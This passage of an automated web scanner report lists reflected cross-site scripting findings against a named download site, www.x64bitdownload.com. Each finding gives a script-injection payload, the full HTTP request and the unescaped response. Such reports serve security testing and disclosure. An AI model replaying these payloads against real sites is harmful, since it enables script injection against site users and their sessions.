<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2" /> ...[SNIP]...
1.182. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5836"><script>alert(1)</script>5c1d810d2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:28:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:38:38 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81577
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7253d"><script>alert(1)</script>294861f4a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:32:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2500"><script>alert(1)</script>7d8844f103c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:33:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:42 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81971
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c" /> ...[SNIP]...
1.185. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7af"><script>alert(1)</script>b1ff1afa51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:28:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:39:03 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25cff"><script>alert(1)</script>55fd3605a8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:32:41 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7de5"><script>alert(1)</script>3c381f515e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:33:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:58 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3" /> ...[SNIP]...
1.188. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3aea"><script>alert(1)</script>baafb6db136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:29:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:40:07 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec4b"><script>alert(1)</script>598f0083468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:33:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b81e"><script>alert(1)</script>bcc56172be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:28 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7" /> ...[SNIP]...
1.191. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7654"><script>alert(1)</script>5fed9989261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:29:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:39:53 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d364"><script>alert(1)</script>136359d2933 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:32:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f59"><script>alert(1)</script>ff671245bd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:33:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:21 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6" /> ...[SNIP]...
1.194. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bca"><script>alert(1)</script>6ff9196ddc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:30:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:40:05 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d9ce"><script>alert(1)</script>2ed7bbf475d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:34:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e40"><script>alert(1)</script>ceaef40d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:47 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6" /> ...[SNIP]...
1.197. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05c7"><script>alert(1)</script>0644b46147f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:29:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:40:28 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d7f"><script>alert(1)</script>2644ecf6c0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:35:33 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94a6"><script>alert(1)</script>4f8ac4abfac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac" /> ...[SNIP]...
1.200. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c898"><script>alert(1)</script>5c39625c5a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
